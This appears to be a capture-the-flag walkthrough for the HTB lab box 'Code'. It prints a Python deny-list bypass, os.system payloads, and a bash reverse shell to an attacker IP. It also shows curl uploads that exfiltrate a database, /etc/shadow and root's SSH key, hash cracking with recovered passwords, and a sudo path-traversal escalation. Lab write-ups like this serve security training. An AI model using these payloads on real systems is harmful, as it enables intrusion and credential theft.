Code :: 4wayhandshake — CTF Walkthroughs, Tips & Tricks

INTRODUCTION

Code was released as the 11th box in HTB’s Season 7 Vice. True to its name, Code is about targeting a company that develops and operates an online code editor for Python. In my opinion, it’s the easiest box of the season. By my count, there were only three steps (and four “tricks”) required to finish Code. Regardless, I found it to be very enjoyable.

Recon was practically nonexistent. Feel free to do the basics, just for practice, but don’t waste any time on it.

Foothold was a lot of fun. We quickly find out that there is a basic protective mechanism guarding us from abusing the web app too much. By thinking about the web app architecture, we can infer how the author made this mechanism, and bypass it very easily. While it’s not quite the same, a little understanding of Jinja2 SSTI payloads may come in handy 😮

The user flag is, oddly, on the first user you gain access to. After the flag, if you’ve read the web app source code, you’ll already know exactly what to look for. Some very easy cracking and credential re-use allow you to pivot to the next user.

The root flag is also very easy. Only one script can be run with sudo, and this script practically screams at you how to abuse it for privesc. Once you see it, I recommend you enable the verbose log option. The PE vector involves an arbitrary file read, so… interpret that however you want! 😂

Code is the perfect choice if you’re on a limited timeframe and want to practice some web app skills.

title picture

RECON

nmap scans

Port scan

I’ll start by setting up a directory for the box, with an nmap subdirectory. I’ll set $RADDR to the target machine’s IP and scan it with a TCP port scan over all 65535 ports:

sudo nmap -p- -O --min-rate 1000 -oN nmap/port-scan-tcp.txt $RADDR

PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

☝️ That’s probably a Flask server, not UPnP.

Script scan

To investigate a little further, I ran a script scan over the TCP ports I just found:

TCPPORTS=`grep "^[0-9]\+/tcp" nmap/port-scan-tcp.txt | sed 's/^\([0-9]\+\)\/tcp.*/\1/g' | tr '\n' ',' | sed 's/,$//g'`
sudo nmap -sV -sC -n -Pn -p$TCPPORTS -oN nmap/script-scan-tcp.txt $RADDR

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b5:b9:7c:c4:50:32:95:bc:c2:65:17:df:51:a2:7a:bd (RSA)
|   256 94:b5:25:54:9b:68:af:be:40:e1:1d:a8:6b:85:0d:01 (ECDSA)
|_  256 12:8c:dc:97:ad:86:00:b4:88:e2:29:cf:69:b5:65:96 (ED25519)
5000/tcp open  http    Gunicorn 20.0.4
|_http-title: Python Code Editor
|_http-server-header: gunicorn/20.0.4

Confirmed, we definitely have an HTTP server on port 5000.
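The grep/sed pipeline that builds $TCPPORTS can also be written in Python, which some people find easier to read back later. This is only a sketch: the function name open_tcp_ports is my own, and unlike the pipeline it keeps only ports whose state is "open".

```python
import re

def open_tcp_ports(nmap_output: str) -> str:
    """Return the open TCP ports from nmap's normal (-oN) output, comma-separated."""
    # Lines of interest look like "5000/tcp open  upnp".
    ports = re.findall(r"^(\d+)/tcp\s+open\b", nmap_output, flags=re.MULTILINE)
    return ",".join(ports)

sample = """PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp
"""
print(open_tcp_ports(sample))  # 22,5000
```

In practice the input would be the contents of nmap/port-scan-tcp.txt rather than the inline sample.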

UDP scan

To be thorough, I’ll also do a scan over the common UDP ports. UDP scans take quite a bit longer, so I limit it to only common ports:

sudo nmap -sUV -T4 -F --version-intensity 0 -oN nmap/port-scan-udp.txt $RADDR

No important results.

Webserver Strategy

There was no redirect to any domain, but I’ll add code.htb to my /etc/hosts and do banner-grabbing for the web server:

DOMAIN=code.htb
echo "$RADDR $DOMAIN" | sudo tee -a /etc/hosts
whatweb --aggression 3 http://$DOMAIN:5000 && curl -IL http://$RADDR:5000

whatweb

No new information from that.

(Sub)domain enumeration

Since we only have a single HTTP server listening, and it’s on port 5000, it doesn’t really make sense to scan for alternate vhosts at the domain or subdomain level.

Directory enumeration

I’ll move on to directory enumeration. First, on http://code.htb:5000:

I prefer to not run a recursive scan, so that it doesn’t get hung up on enumerating CSS and images.

WLIST=/usr/share/wordlists/dirs-and-files.txt
ffuf -w $WLIST:FUZZ -u http://$DOMAIN:5000/FUZZ -t 60 -ic -c -o fuzzing/ffuf-directories-root -of json -timeout 4 -v

directory enumeration

The /codes directory draws some attention. The rest seems like a typical authenticated web app.

Exploring the Website

As indicated by the website title, the target seems to be some kind of online Python tool. It seems pretty likely that I’ll use some kind of SSTI or command injection to gain a foothold.

Undoubtedly, it has some kind of sandboxing applied! I’ll have to try to fingerprint it.

index page

By examining the response from the index page, we can see quite easily that this site is using a library called ace.js - an online code editor:

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script>
    // Load the Ace editor modes and themes
    ace.config.set('basePath', 'https://cdnjs.cloudflare.com/ajax/libs/ace/1.4.12/');
    var editor = ace.edit("editor");
    editor.session.setMode("ace/mode/python");
    editor.setTheme("ace/theme/monokai");

    $.ajaxSetup({
        xhrFields: {
            withCredentials: true
        }
    });

    function runCode() {
        var code = editor.getValue();
        $.post('/run_code', {code: code}, function(data) {
            document.getElementById('output').textContent = data.output;
        });
    }
    // ...

Now, in ZAP, I’ll add the target code.htb (and any of its subdomains) to the Default Context and proceed to “Spider” the website:

sitemap

However, I can already see that the Spider operation didn’t pick up any of the API endpoints used alongside ace.js. Of those, I’ve already seen:

POST /run_code
GET /load_code/<code_id>
POST /save_code

🤔 Note that we’re running Python, which is a server-side language here.
Browsers don’t run Python natively. At best, it can be transpiled into JavaScript or run through a WebAssembly build of the interpreter, and the runCode() function above does neither.
Ace.js is only a client-side code editor; runCode() sends the code in the form-encoded body of a POST /run_code request. That means that it’s actually Python + Flask, running server-side, that will execute our code.
👉 Why does this matter? Because any sandboxing/protection will be running server-side.
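To make the request shape concrete: jQuery’s $.post with a plain object sends a form-encoded body, so the same request can be built outside the browser. Here is a minimal sketch using only the standard library. The helper name build_run_code_request is hypothetical, and the base URL assumes the code.htb hosts entry from earlier.

```python
from urllib.parse import urlencode
from urllib.request import Request

def build_run_code_request(base_url: str, code: str) -> Request:
    """Build (but do not send) the POST that the editor's runCode() makes."""
    body = urlencode({"code": code}).encode()
    return Request(
        f"{base_url}/run_code",
        data=body,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )

req = build_run_code_request("http://code.htb:5000", 'print("Hello, world!")')
print(req.get_method(), req.full_url)
print(req.data.decode())
```

Passing req to urllib.request.urlopen() would actually send it; judging by the page’s JavaScript, the response should be JSON with an output field.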

FOOTHOLD

Code Editor

Restricted Keywords

The sample Hello world line runs fine. Can we read a file?

with open('/etc/passwd', 'r') as f:
    print(f.read())

sandbox fingerprinting 1

After trying variations on this, it seems that the open keyword is restricted. In fact, we can’t even print a string with the word “open”:

sandbox fingerprinting 2

However, we can bypass this by breaking the restricted word into pieces: print("op"+"en sesame!") works perfectly fine.

By testing a few other things, I’ve identified these “restricted” keywords:
open, read, write
import, __builtins__

🤔 Since we can’t type certain function names directly… maybe we can look them up by name, as strings? open and __import__ both live in the builtins module, and __builtins__ is the name that exposes it. In code loaded as a module (such as a Flask app under Gunicorn), it can be accessed as a dictionary!

⭐ We can access any element (any built-in function) according to its key (a string, in this case), so we can re-use our bypass from earlier. Just break the “restricted keyword” into two words!
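Here is a small sketch of that lookup which can be tried locally. The helper get_builtin is my own name, not something from the target. It also covers a CPython detail: __builtins__ is the builtins module when a script is run directly, but a plain dict inside imported modules.

```python
def get_builtin(name: str):
    """Look up a builtin by its string name via globals()['__builtins__']."""
    namespace = globals()["__buil" + "tins__"]
    # In __main__ this is the builtins module; elsewhere it is already a dict.
    if not isinstance(namespace, dict):
        namespace = vars(namespace)
    return namespace[name]

opener = get_builtin("op" + "en")
print(opener is open)  # True
```

Because the key is an ordinary string, it can be assembled from any pieces, which is exactly what the bypass relies on.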

Reading Files

Here’s how we can use open without being blocked:

func_name = "op"+"en"
args = ["/etc/passwd", "r"]
f1 = globals().get('__buil'+'tins__').get(func_name)
res = f1(*args)  # res is now a file object (io.TextIOWrapper)!

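Let’s double-check that it actually worked… We can verify this is actually a file object by checking what attributes it has. In Python, calling dir() on an object returns a list of its attribute names, methods included.
Go ahead and try it on your own machine! One caveat: in a script run directly, __builtins__ is the builtins module rather than a dictionary, so swap the .get(func_name) lookup for getattr(..., func_name) when testing locally.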
func_name = "op"+"en"
args = ["/etc/passwd", "r"]
f1 = globals().get('__buil'+'tins__').get(func_name)
f = f1(*args)
for idx, _method in enumerate(dir(f)):
    print(f'[{idx}]: {_method}')
👍 Confirmed! This strategy looks like it’ll work.

But now we’re back at the same problem: we need to use read, but it’s one of the “restricted keywords”. Can we find a way to re-use the same bypass as before (breaking the keyword into two words)?

No problem! All we need is getattr. You call getattr on an object, and specify what method you want (as a string) - so we can indeed re-use the same bypass:

func_name = "op"+"en"
args = ["/etc/passwd", "r"]

f1 = globals().get('__buil'+'tins__').get(func_name)
f = f1(*args)
f2 = getattr(f,'re'+'ad')
print(f2())

arb file read

😎 Perfect. Now I can see that the only users with home directories are martin and app-production.

Attempting to read the SSH key for app-production was unsuccessful, but the error still indicated that the app is running as that user (I got a file-not-found error instead of a permissions error).

Since this is a Flask server, I’d be willing to bet that the source code is in a file called app.py. We should be able to read it by using a relative filepath…

reading source code

👏 Yup, it worked. Perusing this file, we finally get to know the whole deny-list of “restricted keywords”:

@app.route('/run_code', methods=['POST'])
def  run_code():
    code = request.form['code']
    old_stdout = sys.stdout
    redirected_output = sys.stdout = io.StringIO()
    try:
        for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write', 'subprocess', '__import__', '__builtins__']:
            if keyword in code.lower():
                return jsonify({'output': 'Use of restricted keywords is not allowed.'})
        exec(code)
        output = redirected_output.getvalue()
    except Exception as e:
        output = str(e)
    finally:
        sys.stdout = old_stdout
    return jsonify({'output': output})
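With the deny-list known, payloads can be checked locally before they are sent. The sketch below copies the keyword list and the substring test from app.py. The helper names is_blocked and split_literal are my own, and splitting every string into single characters is just one simple way to guarantee that no keyword survives.

```python
DENY_LIST = ['eval', 'exec', 'import', 'open', 'os', 'read', 'system',
             'write', 'subprocess', '__import__', '__builtins__']

def is_blocked(code: str) -> bool:
    """Same test as app.py: any deny-listed word as a case-insensitive substring."""
    return any(keyword in code.lower() for keyword in DENY_LIST)

def split_literal(text: str) -> str:
    """Build an expression equal to `text`, one character per string literal."""
    return "+".join(repr(ch) for ch in text) or "''"

print(is_blocked('print("open sesame!")'))     # True
print(is_blocked('print("op"+"en sesame!")'))  # False
print(is_blocked('print("almost")'))           # True: "os" is a substring
print(split_literal("os"))                     # 'o'+'s'
```

The third line shows a side effect of substring matching: perfectly harmless code gets rejected too, while the concatenated form passes straight through.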

RCE

Normally, gaining RCE through Python means reaching for something like os, subprocess, eval, or exec.

Given the above code in app.py, you might think "exec is right there, and os is probably imported too, nice!". That doesn’t help us directly: exec(code) with no explicit namespace runs our code in the caller’s scope, but the deny-list rejects any submission that spells out one of those names.

Fear not. We’ve already accessed __builtins__, so importing a module is trivial. Below, I’ve also made a reference to os.system and called it rce.
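How much of the surrounding program the submitted code can see is easy to check locally. Per the Python documentation, exec() without explicit globals/locals runs in the current scope. A minimal sketch, assuming a hypothetical run_like_app() that mirrors the exec(code) call and output capture in run_code():

```python
import contextlib
import io

def run_like_app(code: str) -> str:
    """Mimic run_code(): exec() with no explicit globals/locals, stdout captured."""
    marker = "local to run_like_app"  # stands in for app.py's own variables
    buffer = io.StringIO()
    with contextlib.redirect_stdout(buffer):
        exec(code)
    return buffer.getvalue()

# The submitted code can read the caller's local variables...
print(run_like_app("print(marker)"))
# ...and reach __builtins__ through the caller's globals.
print(run_like_app("print('__buil' + 'tins__' in globals())"))
```

This is why the globals().get(...) trick works at all: the payload shares its global namespace with the function that called exec().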

o_s_module = globals().get('__buil'+'tins__').get('__imp'+'ort__')('o'+'s')
rce = getattr(o_s_module,'sys'+'tem')
rce('curl http://10.10.14.12:8000/hi')

got RCE

Well that was easy! Let’s push forward and try to turn this into a reverse shell.

USER FLAG

First, start a reverse shell listener:

sudo ufw allow from $RADDR to any port 4444,8000 proto tcp
bash
nc -lvnp 4444

Now let’s throw a simple bash reverse shell at it:

o_s_module = globals().get('__buil'+'tins__').get('__imp'+'ort__')('o'+'s')
rce = getattr(o_s_module,'sys'+'tem')
rce('bash -c "bash -i >& /dev/tcp/10.10.14.12/4444 0>&1"')

revshell success

Unexpectedly, app-production holds the user flag. Read it for some points:

cat /home/app-production/user.txt

USER FLAG

Web app database

We already saw while reading app.py, the Flask app, that there should be an SQLite database somewhere in the same directory. I didn’t see it immediately while I was looking around, so I searched:

find / -name 'database.db' -type f 2>/dev/null
# /home/app-production/app/instance/database.db

Oh, ok. I guess that’s probably a directory that gets set up at runtime? Let’s exfil it:

curl -F 'file=@/home/app-production/app/instance/database.db' http://10.10.14.12:8000

uploaded database

The database is very simple. Found a couple password hashes right away:

db enum

We can crack these now:

vim loot/db.hash  # Paste the two hashes into the file, one username:hash pair per line
hashcat -m 0 loot/db.hash /usr/share/wordlists/rockyou.txt --username

❔ Hashcat didn’t like me attempting to crack these without specifying a hash mode. Thankfully, from reading app.py we already know that it uses raw MD5 hashes, which are mode 0.
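For intuition about what mode 0 means, here is a toy dictionary attack on a raw (unsalted) MD5 hash. It is a sketch only, and far slower than hashcat. The function name crack_md5 is my own, and the demo hash is computed on the spot rather than copied from the database.

```python
import hashlib

def crack_md5(target_hex: str, candidates):
    """Return the first candidate whose raw MD5 hex digest equals target_hex."""
    target_hex = target_hex.lower()
    for word in candidates:
        if hashlib.md5(word.encode()).hexdigest() == target_hex:
            return word
    return None

# Self-made demo hash, so no real value has to be assumed.
demo_hash = hashlib.md5(b"development").hexdigest()
print(crack_md5(demo_hash, ["admin", "password", "development"]))  # development
```

To run it against a real wordlist, iterate over the stripped lines of the file instead of the inline list. Wordlists like rockyou.txt tend to contain non-UTF-8 bytes, so opening with encoding="latin-1" is a common workaround.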

cracked hashes

Great, there are two confirmed credentials for the web app:

development : development
martin : nafeelswordsmaster

Credential reuse

The only other authenticated service I’ve come across is SSH:

	Service	Username	Password
❌	SSH	app-production	development
✅	SSH	martin	nafeelswordsmaster

SSH as martin

Excellent, now I don’t need to worry about my reverse shell flaking out.

ROOT FLAG

Local enumeration - martin

As usual when I gain authenticated access to an account, I’ll check what I can sudo, with sudo -l:

# (ALL : ALL) NOPASSWD: /usr/bin/backy.sh

🚨 Seems a likely PE vector! Let’s read the script:

#!/bin/bash

if [[ $# -ne 1 ]]; then
    /usr/bin/echo "Usage: $0 <task.json>"
    exit 1
fi

json_file="$1"

if [[ ! -f "$json_file" ]]; then
    /usr/bin/echo "Error: File '$json_file' not found."
    exit 1
fi

allowed_paths=("/var/" "/home/")

updated_json=$(/usr/bin/jq '.directories_to_archive |= map(gsub("\\.\\./"; ""))' "$json_file")

/usr/bin/echo "$updated_json" > "$json_file"

directories_to_archive=$(/usr/bin/echo "$updated_json" | /usr/bin/jq -r '.directories_to_archive[]')

is_allowed_path() {
    local path="$1"
    for allowed_path in "${allowed_paths[@]}"; do
        if [[ "$path" == $allowed_path* ]]; then
            return 0
        fi
    done
    return 1
}

for dir in $directories_to_archive; do
    if ! is_allowed_path "$dir"; then
        /usr/bin/echo "Error: $dir is not allowed. Only directories under /var/ and /home/ are allowed."
        exit 1
    fi
done

/usr/bin/backy "$json_file"

Notably, the only directory in /home/martin is backups, which (thankfully!) has a premade task.json for us.

I’ll upload this file to my HTTP server so I can play with it from my attacker host:

curl -F 'file=@/home/martin/backups/task.json' http://10.10.14.12:8000

Script Analysis

For the most part, the script is quite clear about what it does. The two confusing parts are the lines that invoke jq, so let’s break them down:

updated_json=$(/usr/bin/jq '.directories_to_archive |= map(gsub("\\.\\./"; ""))' "$json_file")

☝️ For each entry in directories_to_archive, remove all instances of ../ then store the resulting JSON in a bash variable

Easy! The removal isn’t recursive, so we can bypass this by using ..././ instead of ../

/usr/bin/echo "$updated_json" > "$json_file"

☝️ Overwrite the original JSON file with the copy that’s had all ../ removed

directories_to_archive=$(/usr/bin/echo "$updated_json" | /usr/bin/jq -r '.directories_to_archive[]')

☝️ Run the modified directories_to_archive array through jq, effectively removing the commas and delimiting quotation marks then outputting the results line-by-line. Basically, read the array into a format that we can use easily in a Bash loop

Summary

The script’s whole job is to prevent path traversal. All it does is check that the provided backup paths are allowed, then run the actual Backy tool (available from the author’s GitHub repo). However, the script causes two slight complications:

(1) Any ../ gets removed from backup paths
(2) The task.json file gets overwritten every time we run backy.sh

Thankfully, these two effects are nothing more than a mere inconvenience:

(1) can be solved (as I mentioned earlier) by using ..././ instead of ../ for any path traversal.

(2) can be solved by creating a new copy of task.json every time we run the script, then running the script on the new copy only.
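The reasoning behind the ..././ trick can be replayed in a few lines. This sketch approximates the wrapper in Python: re.sub stands in for jq’s gsub (both remove matches in a single left-to-right pass), startswith stands in for the Bash prefix test, and posixpath.normpath shows where the path ends up once it is resolved. The function names are mine.

```python
import posixpath
import re

ALLOWED_PREFIXES = ("/var/", "/home/")

def sanitize(path: str) -> str:
    """Single pass removing every '../', like the gsub call in backy.sh."""
    return re.sub(r"\.\./", "", path)

def is_allowed(path: str) -> bool:
    """Prefix check equivalent to is_allowed_path() in backy.sh."""
    return path.startswith(ALLOWED_PREFIXES)

requested = "/home/app-production/app/..././..././..././root/.ssh"
cleaned = sanitize(requested)
print(cleaned)                      # /home/app-production/app/../../../root/.ssh
print(is_allowed(cleaned))          # True
print(posixpath.normpath(cleaned))  # /root/.ssh
```

Removing the inner ../ from each ..././ leaves a fresh ../ behind, and since the filter never looks at its own output again, the traversal survives while the path still starts with /home/.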

Bypassing backy.sh

The original task.json file was this:

{
    "destination": "/home/martin/backups/",
    "multiprocessing": true,
    "verbose_log": false,
    "directories_to_archive": ["/home/app-production/app"],
    "exclude": [".*"]
}

First, I’ll apply a path traversal to back up the /root/.ssh directory:

"directories_to_archive": ["/home/app-production/app/..././..././..././root/.ssh"],

I’ll also modify …

destination directory to something less conspicuous, /tmp/.4wayhs/dump.
multiprocessing to false, just in case
verbose_log to true, because extra logs never hurt
exclude to be something I don’t want or need, like .git. I didn’t check the backy source code to see how excludes are handled, and this way I don’t really need to.

The final result is:

{
    "destination": "/tmp/.4wayhs/dump",
    "multiprocessing": false,
    "verbose_log": true,
    "directories_to_archive": [
        "/home/app-production/app/..././..././..././..././root/.ssh"
    ],
    "exclude": [
        ".git"
    ]
}

To get around complication (2), I’ll just keep task.json on my attacker host and download a new copy whenever I try running it.

🤦‍♂️ Ahh I always miss the perfect opportunities to use a heredoc! That would have worked quite nicely 🙂

rm -f task.json; curl -O http://10.10.14.12:8000/task.json && sudo /usr/bin/backy.sh /tmp/.4wayhs/task.json
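An alternative to re-downloading the file (in the same spirit as the heredoc idea) is to regenerate it on the target before every run. A minimal sketch, assuming python3 is available there. The function name write_task is my own, and the values mirror the modified task.json.

```python
import json
from pathlib import Path

TASK = {
    "destination": "/tmp/.4wayhs/dump",
    "multiprocessing": False,
    "verbose_log": True,
    "directories_to_archive": [
        "/home/app-production/app/..././..././..././..././root/.ssh"
    ],
    "exclude": [".git"],
}

def write_task(path: str) -> Path:
    """(Re)create the task file so each run starts from an unsanitized copy."""
    target = Path(path)
    target.write_text(json.dumps(TASK, indent=4) + "\n")
    return target
```

Calling write_task("/tmp/.4wayhs/task.json") right before each sudo invocation would undo whatever the wrapper wrote back during the previous run.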

backup successful

# Exfiltrate the dump
cd dump
mv code_home_app-production_app_.._.._.._.._root_.ssh_2025_March.tar.bz2 dump.tar.bz2
curl -F 'file=@dump.tar.bz2' http://10.10.14.12:8000
# Clean up the target
cd ..
rm -rf dump task.json

Now, on my attacker host, I’ll extract the backup using tar:

tar --bzip2 -xf dump.tar.bz2
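Before unpacking an archive that came off a target, it can be handy to look at what is inside first. Here is a sketch using the standard tarfile module. The function name list_backup is my own, and the filename in the usage note is the one chosen during exfiltration.

```python
import tarfile

def list_backup(archive_path: str) -> list[str]:
    """Return the member names of a bzip2-compressed tar archive."""
    with tarfile.open(archive_path, mode="r:bz2") as archive:
        return archive.getnames()
```

For example, print(list_backup("dump.tar.bz2")) would show every path stored in the backup without writing anything to disk.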

As I had hoped, there is an SSH private key inside:

got id rsa

chmod 600 id_rsa
ssh -i ./id_rsa root@code.htb

root ssh

It all worked flawlessly 😁

Grab the root flag to finish off the box:

cat /root/root.txt

CLEANUP

Target

I’ll get rid of the spot where I place my tools, /tmp/.4wayhs:

rm -rf /tmp/.4wayhs

Attacker

There’s also a little cleanup to do on my local / attacker machine. It’s a good idea to get rid of any “loot” and source code I collected that didn’t end up being useful, just to save disk space:

rm loot/database.db

It’s also good policy to get rid of any extraneous firewall rules I may have defined. This one-liner just deletes all the ufw rules:

NUM_RULES=$(($(sudo ufw status numbered | wc -l)-5)); for (( i=0; i<$NUM_RULES; i++ )); do sudo ufw --force delete 1; done; sudo ufw status numbered;

EXTRA CREDIT

Cracking the shadow file

I haven’t cracked a shadow file in quite a while, so I figured I’d do it now. First, as root on the target host, we exfiltrate /etc/passwd and /etc/shadow:

curl -F 'file=@/etc/passwd' http://10.10.14.12:8000
curl -F 'file=@/etc/shadow' http://10.10.14.12:8000

Now I’ll run these through unshadow and attempt to crack using hashcat:

unshadow passwd shadow > unshadowed
hashcat unshadowed /usr/share/wordlists/rockyou.txt
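For anyone curious what unshadow does, it essentially merges the two files: the placeholder in the password field of each passwd line is replaced with the matching hash from shadow. A rough Python approximation follows. It is not the tool’s actual source, and the user and hash in the demo are made up.

```python
def unshadow(passwd_text: str, shadow_text: str) -> list[str]:
    """Replace the password field of each passwd line with its shadow hash."""
    hashes = {}
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2:
            hashes[fields[0]] = fields[1]
    merged = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[0] in hashes:
            fields[1] = hashes[fields[0]]
        merged.append(":".join(fields))
    return merged

# Made-up sample data, for illustration only.
passwd = "alice:x:1000:1000::/home/alice:/bin/bash"
shadow = "alice:$6$examplesalt$examplehash:19000:0:99999:7:::"
print(unshadow(passwd, shadow)[0])
```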

😅 Unfortunately, it’s going to take 1d 17h to finish with rockyou.txt (which we already know has martin’s password) but there is no guarantee that either of the other two passwords will be present in rockyou.txt…

That’s too long to wait! I’ll terminate this now.

Command Injection with Python

Earlier, while gaining a foothold, I glossed over the details for command injection in Python, lumping commands like eval in the same bucket as subprocess. This doesn’t really do it justice, so I wanted to separate the terms I mentioned.

All of the terms I mentioned are for using Python to execute arbitrary code. But what commands can each handle?

OS shell commands: os.system and subprocess are for running OS commands. os.system always goes through the default shell; subprocess only does so when called with shell=True.
Python code: we can send Python code, as a string, to either eval or exec to have it interpreted by Python.

Method	Purpose	Description & Usage	OS-Related Considerations
`os.system`	Execute a shell command	Calls a command via the system shell and returns the command’s exit status. Example: `os.system("ls -l")`	- Runs the command in a new process spawned by the shell. - Executes as the same UID as the Python process. - The call is blocking (the process waits until the command completes). - Minimal flexibility for interacting with input/output streams.
`subprocess`	Execute a shell command with more control	Provides multiple functions (e.g., `subprocess.run`, `subprocess.Popen`, `subprocess.call`, `subprocess.check_output`). Example: `subprocess.run(["ls", "-l"])`	- Spawns a new process for the command, with options to run with or without a shell (`shell=True` or `False`). - Runs as the same UID as the Python process, though you can modify the environment or user context programmatically if needed. - Blocking by default with utilities like `subprocess.run`, but `Popen` can be used for asynchronous behavior. - High flexibility for capturing outputs, error streams, and managing process resources.
`exec`	Execute Python code dynamically	Executes Python code from a string or compiled code object in the current namespace. Example: `exec("print('Hello')")`	- Runs the code within the current Python process without spawning a new process. - Executes with the same privileges and UID as the host process. - It is a blocking call, as the code is executed immediately and completely before moving on. - Not intended for OS shell command execution.
`eval`	Evaluate a Python expression	Evaluates a Python expression (not full statements) and returns the result. Example: `result = eval("2 + 3")`	- Operates within the current Python process, similar to exec, with no new process creation. - Runs using the same context and privileges. It blocks execution until the evaluation is complete. - Limited to expressions and does not handle OS-level tasks.
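The four mechanisms in the table can be compared side by side in a short script. This is just an illustrative sketch: the child process is the Python interpreter itself (via sys.executable) so that the example does not depend on any particular system command being installed.

```python
import os
import subprocess
import sys

# Python code: eval() returns the value of a single expression...
result = eval("2 + 3")

# ...while exec() runs statements and returns None; results land in a namespace.
namespace = {}
exec("total = sum(range(4))", namespace)

# OS command without a shell: arguments are passed as a list.
completed = subprocess.run(
    [sys.executable, "-c", "print('hello from a child process')"],
    capture_output=True, text=True, check=True,
)

# os.system always goes through the shell and only hands back a status code.
status = os.system("exit 0")

print(result, namespace["total"], completed.stdout.strip(), status)
```

Note the difference in what comes back: eval gives a value, exec gives nothing directly, subprocess.run gives an object holding the captured output, and os.system gives only an exit status.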

LESSONS LEARNED

Attacker

👶 Don’t overcomplicate it. When I was finding the command injection during foothold, I spent a little too much time trying to find the perfect tricks for importing os and running the system function. It was all pretty unnecessary! In the end, I could simply import os directly (with the bypass) and run the function by referencing it with getattr.
♻️ “Web” attacks can often be used locally, although they are a little more rare. In this box, we used a path traversal (traditionally a textbook web attack for poorly structured applications) to circumvent the “allowed directories” for backy.

Defender

👤 Isolate the web app. This idea can take many forms. For example, you could place the web app host in a DMZ to isolate it from the rest of the network. It’s also easy to isolate the web app from the rest of the filesystem by using a chroot jail (although the credential re-use would have negated this). You could run the web app and database as containerized microservices to isolate the filesystems, networks, and memory (but again, it’s thwarted by credential re-use).
📦 Use a premade sandbox instead of rolling your own server-side Python protection. Several options exist, such as PyPy Sandbox, or RestrictedPython. A simple deny-list, which was the only protection on this web app, will never work perfectly (the very first bypass I tried was successful).
⚓ Practice defense-in-depth. On this box, a web app firewall, pre-parsing the python code, isolating the python environment, and checking for sensitive data exfiltration would have all been highly beneficial.